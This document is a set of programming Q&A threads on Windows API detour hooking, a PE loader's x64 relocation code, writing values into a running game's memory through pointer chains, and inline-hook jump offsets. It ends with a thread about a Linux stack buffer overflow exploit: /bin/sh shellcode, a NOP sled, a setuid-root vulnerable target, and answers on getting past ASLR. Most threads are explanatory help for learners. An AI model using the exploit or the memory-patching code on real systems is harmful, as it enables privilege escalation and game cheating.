Trying to understand a detour (hooking) function - c++

Hi, I'm trying to understand a function used for Windows API hooking. I want to hook LoadLibraryA to see whether any cheats are trying to inject into my game, so I need to intercept every call to LoadLibraryA.
I wrote comments to explain what I think is going on, but I'm unsure about the later parts:
// src = address of LoadLibraryA in kernel32.dll,
// dst = my function prototype of LoadLibraryA
// len = 5, as we allocate a JMP instruction (0xE9)
PVOID Detour(BYTE* src, const BYTE* dst, const int len)
{
BYTE* jmp = (BYTE*)malloc(len + 5); // allocate 10 bytes
DWORD oldProtection; // change protection of 5 bytes starting from LoadLibraryA in kernel32.dll
VirtualProtect(src, len, PAGE_EXECUTE_READWRITE, &oldProtection); // Changes the protection on a region of committed pages in the virtual address space of the calling process.
memcpy(jmp, src, len); // save 5 first bytes of the start of LoadLibraryA in kernel32.dll from src to jmp
jmp += len; // start from byte 6
jmp[0] = 0xE9; // insert jump from byte 6 - 10:
// jmp looks like this currently: [8BFF] = 2 bytes [55] = 1 byte [8BEC] = 2 bytes [0xE9] = 5 bytes
// ??
*(DWORD*)(jmp + 1) = (DWORD)(src + len - jmp) - 5; // ?
// ??
src[0] = 0xE9;
*(DWORD*)(src + 1) = (DWORD)(dst - src) - 5; // ?
// Set the same memory protection as before.
VirtualProtect(src, len, oldProtection, &oldProtection);
// ??
return (jmp - len);
}
Below is the representation before and after the hook (the "Before" and "After" images are not included here).

The function works fine; I just need help understanding what's going on in the later part of the function. I'm unsure what happens from jmp += len; onward.
The first thing I notice is that your code builds the detour and the jump back all in one go, which is different from how I usually see people do it.
memcpy(jmp, src, len);
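You're copying the stolen bytes (the first len bytes of the original function) into your shellcode buffer.
jmp is the start of that buffer, i.e. the address that gets jumped to in order to run the original function.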
jmp += len;
len is the number of stolen bytes, i.e. the bytes you overwrite in the original function. They are copied to the area you jump to, because they must still be executed. So you're advancing to the byte directly following the stolen bytes in your shellcode, which is where the relative jmp will be written.
jmp[0] = 0xE9;
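You're writing the opcode of the relative jump instruction (0xE9, jmp rel32).
*(DWORD*)(jmp + 1) = (DWORD)(src + len - jmp) - 5;
jmp + 1 is the address right after the 0xE9 opcode byte, where the 4-byte relative offset has to go.
(src + len - jmp) - 5 is the equation that produces that offset: the target (src + len, the first original instruction after the stolen bytes) minus the address of the jump, minus 5 because the offset is counted from the end of the 5-byte jump instruction.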
src[0] = 0xE9;
*(DWORD*)(src + 1) = (DWORD)(dst - src) - 5;
You're doing the same thing you did inside your shellcode, except that here you're creating the detour from the original function to dst.
return (jmp - len);
You're returning the address of the start of the shellcode (this is kind of weird, but you have to subtract len because your code did jmp += len).
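To make the two offset calculations concrete, here is a minimal sketch that runs the same steps on plain byte buffers instead of real code pages. Everything in it (write_jmp, jmp_target, simulate_detour, and the pretend addresses passed in) is a hypothetical name made up for illustration, not part of the original function, and it assumes a little-endian host, as on x86.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>
#include <utility>
#include <vector>

// Writes "jmp rel32" at buf[at], pretending buf[0] lives at address `base`.
// rel32 is measured from the end of the 5-byte instruction.
void write_jmp(std::vector<std::uint8_t>& buf, std::size_t at,
               std::uint32_t base, std::uint32_t target) {
    std::uint32_t rel = target - (base + static_cast<std::uint32_t>(at) + 5);
    buf[at] = 0xE9;
    std::memcpy(&buf[at + 1], &rel, sizeof rel);
}

// Decodes the jmp at buf[at] and returns the absolute address it lands on.
std::uint32_t jmp_target(const std::vector<std::uint8_t>& buf, std::size_t at,
                         std::uint32_t base) {
    std::uint32_t rel;
    std::memcpy(&rel, &buf[at + 1], sizeof rel);
    return base + static_cast<std::uint32_t>(at) + 5 + rel;
}

struct Hooked {
    std::vector<std::uint8_t> func;        // original function after patching
    std::vector<std::uint8_t> trampoline;  // stolen bytes followed by the jump back
};

// src, dst and tramp are the pretend addresses of the original function,
// the hook, and the trampoline buffer.
Hooked simulate_detour(std::vector<std::uint8_t> func, std::uint32_t src,
                       std::uint32_t dst, std::uint32_t tramp, std::size_t len) {
    assert(len >= 5 && func.size() >= len);
    Hooked h;
    h.trampoline.assign(len + 5, 0x90);
    std::memcpy(h.trampoline.data(), func.data(), len);  // memcpy(jmp, src, len)
    write_jmp(h.trampoline, len, tramp,
              src + static_cast<std::uint32_t>(len));    // jump back past the stolen bytes
    write_jmp(func, 0, src, dst);                        // detour to the hook
    h.func = std::move(func);
    return h;
}
```

Decoding the two jumps afterwards with jmp_target should give dst for the patched function and src + len for the trampoline, which is exactly what the two "- 5" expressions are for. Note that in a real process the trampoline memory also has to be executable, which plain malloc memory usually is not when DEP is enabled.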

Related

how to store PE32+ preferred imageBase address?

I have a PE loader that works fine with 32-bit PEs, but with x64 ones it can't allocate the preferred base address 0x0000000140000000, since it only reads it as 0x40000000.
Here is how I allocate that address:
DWORD hdr_image_base = p_NT_HDR->OptionalHeader.ImageBase;
char* ImageBase = (char*)VirtualAlloc((void*)hdr_image_base, size_of_image, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
But when I hardcode the address, it works just fine:
char* ImageBase = (char*)VirtualAlloc((void*)0X140000000, size_of_image, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
Is DWORD not enough to store the address?
This relocation code also seems to truncate a value somewhere, since it works for 32-bit images but not for x64:
//this is how much we shifted the ImageBase
DWORD_PTR delta_VA_reloc = (reinterpret_cast<DWORD_PTR>(ImageBase)) - p_NT_HDR->OptionalHeader.ImageBase;
// if there is a relocation table, and we actually shifted the ImageBase
if (data_directory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0 && delta_VA_reloc != 0) {
printf("\n[*] The relocated address is not the preferred address, started relocating\n");
//calculate the relocation table address
IMAGE_BASE_RELOCATION* p_reloc = (IMAGE_BASE_RELOCATION*)(ImageBase + data_directory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
//once again, a null terminated array
while (p_reloc->VirtualAddress != 0) {
// how many relocations in this block
// ie the total size, minus the size of the "header", divided by 2 (those are words, so 2 bytes for each)
//std::cout << sizeof(WORD) << "\n"; sizeof word is 2
DWORD size = (p_reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);
// the first relocation element in the block, right after the header (using pointer arithmetic again)
WORD* reloc = (WORD*)(p_reloc + 1);
for (int i = 0; i < size; ++i) {
//type is the first 4 bits of the relocation word
int type = reloc[i] >> 12;
// offset is the last 12 bits
unsigned long long int offset = reloc[i] & 0x0fff;
//printf("--------------- %#llx\n", offset);
//this is the address we are going to change
DWORD* change_addr = (DWORD*)(ImageBase + p_reloc->VirtualAddress + offset);
// there is only one type used that needs to make a change
// When relocating, check for type HIGHLOW in PE32 images and DIR64 in PE32+ images
switch (type) {
case IMAGE_REL_BASED_HIGHLOW://for x86
*change_addr += delta_VA_reloc;
break;
case IMAGE_REL_BASED_DIR64://for x64
*change_addr += delta_VA_reloc;
break;
default:
break;
}
}
// switch to the next relocation block, based on the size
p_reloc = (IMAGE_BASE_RELOCATION*)((reinterpret_cast<DWORD_PTR>(p_reloc)) + p_reloc->SizeOfBlock);
}
}
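A small sketch of where the truncation comes from, using fixed-width types so it compiles without the Windows headers. DWORD is 32 bits wide, while ImageBase in the PE32+ optional header (IMAGE_OPTIONAL_HEADER64) is a 64-bit ULONGLONG, so a DWORD can only keep the low half. Likewise, the DIR64 case above writes through a DWORD*, which only updates the low 32 bits of a 64-bit field. The helper names store_in_dword and apply_reloc are hypothetical; the two type constants carry the values winnt.h defines for IMAGE_REL_BASED_HIGHLOW and IMAGE_REL_BASED_DIR64.

```cpp
#include <cstdint>
#include <cstring>

// What "DWORD hdr_image_base = ...ImageBase" does to a 64-bit base:
// only the low 32 bits survive.
std::uint32_t store_in_dword(std::uint64_t image_base) {
    return static_cast<std::uint32_t>(image_base);
}

// Same values as IMAGE_REL_BASED_HIGHLOW / IMAGE_REL_BASED_DIR64 in winnt.h.
constexpr int kRelBasedHighLow = 3;
constexpr int kRelBasedDir64 = 10;

// Applies one base relocation to the bytes at `where`.
// HIGHLOW patches a 32-bit field, DIR64 patches a 64-bit field.
void apply_reloc(unsigned char* where, int type, std::uint64_t delta) {
    if (type == kRelBasedHighLow) {
        std::uint32_t v;
        std::memcpy(&v, where, sizeof v);
        v += static_cast<std::uint32_t>(delta);
        std::memcpy(where, &v, sizeof v);
    } else if (type == kRelBasedDir64) {
        std::uint64_t v;
        std::memcpy(&v, where, sizeof v);
        v += delta;  // a carry into the upper 32 bits is kept
        std::memcpy(where, &v, sizeof v);
    }
    // other types (e.g. padding entries) need no change
}
```

store_in_dword(0x140000000) yields 0x40000000, which matches the symptom in the question. In the loader itself this would probably mean holding the base in a ULONGLONG or DWORD_PTR and using a ULONGLONG* for the DIR64 case, but treat that as a suggestion to verify rather than a tested fix.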

C++ How to take value from EXE + Pointer + Offset + Offset?

I'm learning to modify game values using C++, but now I'm stuck.
I know how to edit, for example, the FLOAT value of the player's speed:
uintptr_t _EntitiesBase = (uintptr_t)GetModuleHandle(L"EntitiesMP.dll");
uintptr_t EntityBase = _EntitiesBase + 0x3153D0;
DWORD Run = 0xDE4;
*(FLOAT*)(*(DWORD*)EntityBase + Run) = Value;
But I don't know how to edit values that sit behind several offsets (Engine.dll + 0xD52AB0 + 0x48 + 0x228), because in the end I get the wrong value, not the one I wanted to change.
For example, in Cheat Engine, the same thing looks like this:
I added Engine.dll + 0xD52AB0 as a pointer, then added offset 0x48 and offset 0x220, and it gives me the address 2DC7E488, which contains the FLOAT value that I need to change.
Do you have any ideas?
You can use ReadProcessMemory to read process memory and WriteProcessMemory to write it. To follow the chain, call ReadProcessMemory once for every pointer level, then write the new value at the final address with WriteProcessMemory:
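uintptr_t entitybase;
uintptr_t value1;
float newValue = 100000;
// Read the pointer stored at Engine.dll + 0xD52AB0
ReadProcessMemory(ProcessHandle, (LPCVOID)((uintptr_t)EngineDllHandle + 0xD52AB0), &entitybase, sizeof(entitybase), 0);
// Read the pointer stored at that pointer + 0x48
ReadProcessMemory(ProcessHandle, (LPCVOID)(entitybase + 0x48), &value1, sizeof(value1), 0);
// The last offset is added but not dereferenced: this is the address of the float itself
WriteProcessMemory(ProcessHandle, (LPVOID)(value1 + 0x220), &newValue, sizeof(newValue), 0);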
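Since the code in the question runs inside the game process (it uses GetModuleHandle and dereferences directly), the same chain can also be followed with plain pointer reads. The sketch below is one way to write that; resolve_chain is a hypothetical helper, and the rule it implements (read the pointer at the current address, then add the next offset) is my understanding of how Cheat Engine lists pointer offsets.

```cpp
#include <cstdint>
#include <cstring>
#include <initializer_list>

// Follows a multi-level pointer: for every offset, read the pointer stored
// at the current address and add the offset to it. The result is the
// address of the final value, which is not dereferenced here.
std::uintptr_t resolve_chain(std::uintptr_t base,
                             std::initializer_list<std::uintptr_t> offsets) {
    std::uintptr_t addr = base;
    for (std::uintptr_t off : offsets) {
        std::uintptr_t ptr;
        std::memcpy(&ptr, reinterpret_cast<const void*>(addr), sizeof ptr);
        addr = ptr + off;
    }
    return addr;
}
```

With the numbers from the question this would be called as resolve_chain(engineBase + 0xD52AB0, {0x48, 0x220}), where engineBase is the module handle cast to uintptr_t, and the float is then written through the returned address. This only works in-process and does no validity checks, so a null pointer anywhere in the chain will crash.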

Changing Value of a Register using C++

I'm trying to change an integer value of a register using C++.
This is what I've got...
DWORD_PTR* value_pointer= NULL;
__asm
{
MOV [value_pointer], esp
}
// Create a pointer so we can modify the integer value stored in ESP, via value_pointer...
// We do +0x10 because the address is actually +0x10 ahead, I just couldn't compile the code using MOV [value_pointer], DWORD PTR SS:[ESP+0x10]
// Assume ESP+0x10 holds an integer value of 8
char* adjustable_value_pointer = ((char*)value_pointer + 0x10);
adjustable_value_pointer += 4;
Now if we assumed that ESP+0x10 originally held an integer value of 8, then when ESP+0x10 is referenced again (in assembly) after this code runs the value should now be 12, not 8.
But this doesn't seem to work for me...
Any help please?!
The line adjustable_value_pointer += 4; only moves the pointer forward by 4 bytes; it never writes to the memory it points at. value_pointer should be a DWORD* instead of a DWORD_PTR*, and you don't need to declare a new pointer; you can just use array indexing with value_pointer as the base (and adjust the index according to the stride):
value_pointer[4] += 4;
This indexes 4 DWORDs (16 bytes, i.e. 0x10) past value_pointer and adds 4 to the value stored at that address.
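The difference between changing the pointer and changing the value it points to can be seen without any inline assembly. In this sketch an ordinary array stands in for the stack, with element 4 playing the role of [ESP+0x10]; both function names are hypothetical.

```cpp
#include <cstdint>

// What the question's code does: it advances a local pointer by 4 bytes.
// The memory at base + 0x10 is never written, so the value is unchanged.
std::uint32_t bump_pointer_only(std::uint32_t* base) {
    char* p = reinterpret_cast<char*>(base) + 0x10;
    p += 4;   // p now refers to base + 0x14; nothing was stored
    (void)p;
    return base[4];
}

// What was intended: add 4 to the value stored at base + 0x10.
// base[4] is 4 elements of 4 bytes each, i.e. 0x10 bytes past base.
std::uint32_t bump_value(std::uint32_t* base) {
    base[4] += 4;
    return base[4];
}
```

Starting from an array whose element 4 holds 8, bump_pointer_only leaves it at 8, while bump_value changes it to 12.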

Calculating offset for hotpatching/inline function hooking

From http://lastfrag.com/hotpatching-and-inline-hooking-explained/,
Q1) Does code proceed from high memory to low memory or vice versa?
Q2) More importantly, when calculating the replacement offset, why do you have to subtract the size of the function preamble (5 bytes)? Is it because the offset starts from the end of the instruction and not the beginning?
DWORD ReplacementAddressOffset = ReplacementAddress - OriginalAddress - 5;
Full Code:
void HookAPI(wchar_t *Module, char *API, DWORD Function)
{
HMODULE hModule = LoadLibrary(Module);
DWORD OriginalAddress = (DWORD)GetProcAddress(hModule, API);
DWORD ReplacementAddress = (DWORD)Function;
DWORD ReplacementAddressOffset = ReplacementAddress - OriginalAddress - 5;
LPBYTE pOriginalAddress = (LPBYTE)OriginalAddress;
LPBYTE pReplacementAddressOffset = (LPBYTE)(&ReplacementAddressOffset);
DWORD OldProtect = 0;
DWORD NewProtect = PAGE_EXECUTE_READWRITE;
VirtualProtect((PVOID)OriginalAddress, 5, NewProtect, &OldProtect);
for (int i = 0; i < 5; i++)
Store[i] = pOriginalAddress[i];
pOriginalAddress[0] = (BYTE)0xE9;
for (int i = 0; i < 4; i++)
pOriginalAddress[i + 1] = pReplacementAddressOffset[i];
VirtualProtect((PVOID)OriginalAddress, 5, OldProtect, &NewProtect);
FlushInstructionCache(GetCurrentProcess(), NULL, NULL);
FreeLibrary(hModule);
}
Q3) In this code, the relative address of a jmp instruction is being replaced; relAddrSet is a pointer to the original destination; to is a pointer to the new destination. I don't understand the calculation of the to address, why is it that you have to add the original destination to the functionForHook + opcodeOffset?
DWORD *relAddrSet = (DWORD *)(currentOpcode + 1);
DWORD_PTR to = (*relAddrSet) + ((DWORD_PTR)functionForHook + opcodeOffset);
*relAddrSet = (DWORD)(to - ((DWORD_PTR)originalFunction + opcodeOffset));
Yes, the relative address is the offset measured from the end of the instruction, which is why you have to subtract 5.
But, in my opinion, you should just forget the idea of the relative jump and try an absolute jump.
Why? Because it is a lot easier and x86-64 compatible (relative jumps are limited to +/-2GB).
The absolute jump is (x64):
48 b8 ef cd ab 89 67 45 23 01    mov rax, 0x0123456789abcdef
ff e0                            jmp rax
And for x86:
b8 67 45 23 01                   mov eax, 0x01234567
ff e0                            jmp eax
Here is the modified code (the loader is now 7 bytes instead of 5):
void HookAPI(wchar_t *Module, char *API, DWORD Function)
{
HMODULE hModule = LoadLibrary(Module);
LPBYTE OriginalAddress = (LPBYTE)GetProcAddress(hModule, API);
DWORD ReplacementAddress = (DWORD)Function;
DWORD OldProtect = 0;
DWORD NewProtect = PAGE_EXECUTE_READWRITE;
VirtualProtect(OriginalAddress, 7, NewProtect, &OldProtect);
memcpy(Store, OriginalAddress, 7); // save the 7 bytes about to be overwritten (Store must hold at least 7 bytes)
memcpy(OriginalAddress, "\xb8\x00\x00\x00\x00\xff\xe0", 7); // mov eax, imm32; jmp eax
memcpy(OriginalAddress + 1, &ReplacementAddress, sizeof(ReplacementAddress)); // fill in imm32
VirtualProtect(OriginalAddress, 7, OldProtect, &NewProtect);
FlushInstructionCache(GetCurrentProcess(), NULL, 0);
FreeLibrary(hModule);
}
The code is the same for x64, but you have to add 2 nops (90) at the beginning or the end in order to match the size of the instructions being overwritten, so the loader is "\x48\xb8<8-byte addr>\xff\xe0\x90\x90" (14 bytes).
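As an illustration of the two byte sequences above, here is a small sketch that only builds the stub bytes for a given target address; it does not patch anything. make_abs_jmp32 and make_abs_jmp64 are hypothetical helper names, and the address is written byte by byte in little-endian order so the result does not depend on the host.

```cpp
#include <array>
#include <cstdint>

// x86: b8 <imm32> ff e0  ->  mov eax, imm32 ; jmp eax  (7 bytes)
std::array<std::uint8_t, 7> make_abs_jmp32(std::uint32_t target) {
    std::array<std::uint8_t, 7> stub{0xB8, 0, 0, 0, 0, 0xFF, 0xE0};
    for (int i = 0; i < 4; ++i)
        stub[1 + i] = static_cast<std::uint8_t>(target >> (8 * i));
    return stub;
}

// x64: 48 b8 <imm64> ff e0  ->  mov rax, imm64 ; jmp rax  (12 bytes,
// before any nop padding)
std::array<std::uint8_t, 12> make_abs_jmp64(std::uint64_t target) {
    std::array<std::uint8_t, 12> stub{0x48, 0xB8, 0, 0, 0, 0, 0, 0, 0, 0, 0xFF, 0xE0};
    for (int i = 0; i < 8; ++i)
        stub[2 + i] = static_cast<std::uint8_t>(target >> (8 * i));
    return stub;
}
```

For 0x0123456789abcdef and 0x01234567 these produce the same bytes as the two listings above. Keep in mind that the stub overwrites eax/rax, so it is only suitable at a point where that register holds nothing the callee needs, such as a normal function entry.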
Q1) The program runs from lower to higher addresses (i.e. the program counter is increased by the size of each instruction, except for jumps, calls and returns). But I am probably missing the point of the question.
Q2) Yes, on x86 a jump is executed after the program counter has already been increased by the size of the jump instruction (5 bytes); when the CPU adds the jump offset to the program counter to calculate the target address, the program counter has already been advanced by 5.
Q3) This code is quite weird, but it may work. I suppose that *relAddrSet initially contains a jump offset to originalFunction (i.e. *relAddrSet == originalFunction - relativeOffset). If this is true, the final result is that *relAddrSet contains a jump offset to functionForHook. Indeed, the last instruction becomes:
*relAddrSet=(originalFunction-relativeOffset)+functionForHook-originalFunction
== functionForHook-relativeOffset
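Taken literally, the arithmetic in the Q3 snippet is new offset = old offset + (functionForHook + opcodeOffset) - (originalFunction + opcodeOffset). One possible reading, and this is an assumption since the question gives no context, is that a relative jmp/call was copied from one location to another and its offset is being adjusted so that it still reaches the same absolute target. The sketch below shows that adjustment with hypothetical names (relocate_rel32, target_of) and 32-bit pretend addresses.

```cpp
#include <cstdint>

// Absolute address reached by a 5-byte jmp/call rel32 located at insn_addr.
std::uint32_t target_of(std::uint32_t insn_addr, std::uint32_t rel) {
    return insn_addr + 5 + rel;
}

// Offset to store when the same instruction is moved from old_addr to
// new_addr and must keep its target. The "+ 5" appears on both sides and
// cancels, which would explain why the snippet in Q3 never adds it.
std::uint32_t relocate_rel32(std::uint32_t rel, std::uint32_t old_addr,
                             std::uint32_t new_addr) {
    std::uint32_t to = rel + old_addr;  // plays the role of "to" in the question
    return to - new_addr;
}
```

For example, an instruction at 0x401010 with offset 0xFEB targets 0x402000; after moving it to 0x900000 and applying relocate_rel32, target_of still returns 0x402000.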
Yes, code runs "forward" if I understand this question correctly. One instruction is executed after another if it is not branching.
An instruction that does a relative jump (JMP, CALL) does the jump relative to the start of the next instruction. That's why you have to subtract the length of the instruction (here: 5) from the difference.
I can't answer your third question. Please give some context and what the code is supposed to do.

Buffer overflow exploit not working on gcc

I was trying to run this buffer overflow exploit against a vulnerable program, vuln.c, compiled with gcc (I found this in a tutorial; the code is not mine). The shellcode spawns a shell.
exploit.c code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";
unsigned long sp(void) // This is just a little function
{ __asm__("movl %esp, %eax");} // used to return the stack pointer
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;
offset = 0; // Use an offset of 0
esp = sp(); // Put the current stack pointer into esp
ret = esp - offset; // We want to overwrite the ret address
printf("Stack pointer (ESP) : 0x%x\n", esp);
printf(" Offset from ESP : 0x%x\n", offset);
printf("Desired Return Addr : 0x%x\n", ret);
// Allocate 600 bytes for buffer (on the heap)
buffer = malloc(600);
// Fill the entire buffer with the desired ret address
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 600; i+=4)
{ *(addr_ptr++) = ret; }
// Fill the first 200 bytes of the buffer with NOP instructions
for(i=0; i < 200; i++)
{ buffer[i] = '\x90'; }
// Put the shellcode after the NOP sled
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }
// End the string
buffer[600-1] = 0;
// Now call the program ./vuln with our crafted buffer as its argument
execl("./vuln", "vuln", buffer, 0);
// Free the buffer memory
free(buffer);
return 0;
}
This exploit is for the vulnerable code vuln.c:
int main(int argc, char *argv[])
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}
But when I run it using ./exploit, it gives a segmentation fault instead of opening the shell. I used the commands:
sudo chown root vuln
sudo chmod +s vuln
ls -l vuln
gcc -fno-stack-protector -o vuln vuln.c
./vuln
gcc -o exploit exploit.c
./exploit
It shows the result:
(gdb) run
Starting program: /home/a/exploit
Stack pointer (ESP) : 0xbffff338
Offset from ESP : 0x0
Desired Return Addr : 0xbffff338
process 4669 is executing new program: /home/a/vuln
Program received signal SIGSEGV, Segmentation fault.
0xbffff338 in ?? ()
(gdb) info registers
eax 0x0 0
ecx 0xbfe3f5a0 -1075579488
edx 0xbfe3dca8 -1075585880
ebx 0xb76e4ff4 -1217507340
esp 0xbfe3dc60 0xbfe3dc60
ebp 0xbffff338 0xbffff338
esi 0x0 0
edi 0x0 0
eip 0xbffff338 0xbffff338
eflags 0x10246 [ PF ZF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)
Please tell me where the problem lies...
Your problem lies in the address you are jumping to.
That exploit does not use a memory leak to learn the stack address, so it is meant to be run on a system where ASLR is disabled.
Even once ASLR is disabled, you may have to run the exploit several times until it jumps to the right shellcode address.
The function sp() returns ESP in the exploit process, but the stack pointer in vuln may differ depending on the call chain and the process. Your gdb output shows this: the return address used is 0xbffff338, while esp in vuln is 0xbfe3dc60. So you will have to adjust the offset until you reach the right address.
Conclusion:
disable ASLR
add an offset that changes on each run and apply it to the ESP value before it is used
Good luck!
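To check whether ASLR is active on the test machine, the current setting can be read from /proc/sys/kernel/randomize_va_space on Linux. Below is a minimal sketch of that check; the function names are hypothetical, and the meaning given to the values 0, 1 and 2 follows the Linux kernel sysctl documentation as I understand it.

```cpp
#include <fstream>
#include <string>

// Reads the ASLR setting from the given file. Returns -1 if the file
// cannot be read or parsed (for example on a non-Linux system).
int read_aslr_setting(
    const std::string& path = "/proc/sys/kernel/randomize_va_space") {
    std::ifstream in(path);
    int value = -1;
    if (!(in >> value)) return -1;
    return value;
}

// Human-readable meaning of the setting.
std::string describe_aslr(int value) {
    switch (value) {
        case 0: return "disabled";
        case 1: return "partial (stack, mmap base, VDSO)";
        case 2: return "full (also heap)";
        default: return "unknown";
    }
}
```

If describe_aslr(read_aslr_setting()) reports anything other than "disabled", the stack address seen by sp() in one process is not a reliable guess for the stack address in another, which is consistent with the mismatch in the gdb output.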